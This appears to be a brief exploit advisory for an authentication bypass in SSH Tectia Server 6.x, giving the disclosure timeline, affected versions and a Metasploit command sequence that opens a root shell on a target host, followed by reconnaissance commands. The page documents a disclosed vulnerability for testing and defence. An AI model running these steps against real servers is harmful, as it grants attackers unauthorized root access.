Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope the 2012-12-01
Metasploit PoC the 2012-12-04

PoC provided by :

kingcope
bperry
sinn3r

Reference(s) :

Full Disclosure
Tectia Support

Affected version(s) :

SSH Tectia Server 6.0.4 to 6.0.20
SSH Tectia Server 6.1.0 to 6.1.12
SSH Tectia Server 6.2.0 to 6.2.5
SSH Tectia Server 6.3.0 to 6.3.2

Tested on Centos 5.8 x86 with :

SSH Tectia Server 6.3.2-33

Description :

This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request before password authentication, allowing any remote user to bypass the login routine, and then gain access as root.

Commands :

use exploit/unix/ssh/tectia_passwd_changereq
set RHOST 192.168.178.34
set PAYLOAD cmd/unix/interact
exploit

id
uname -a
/sbin/ifconfig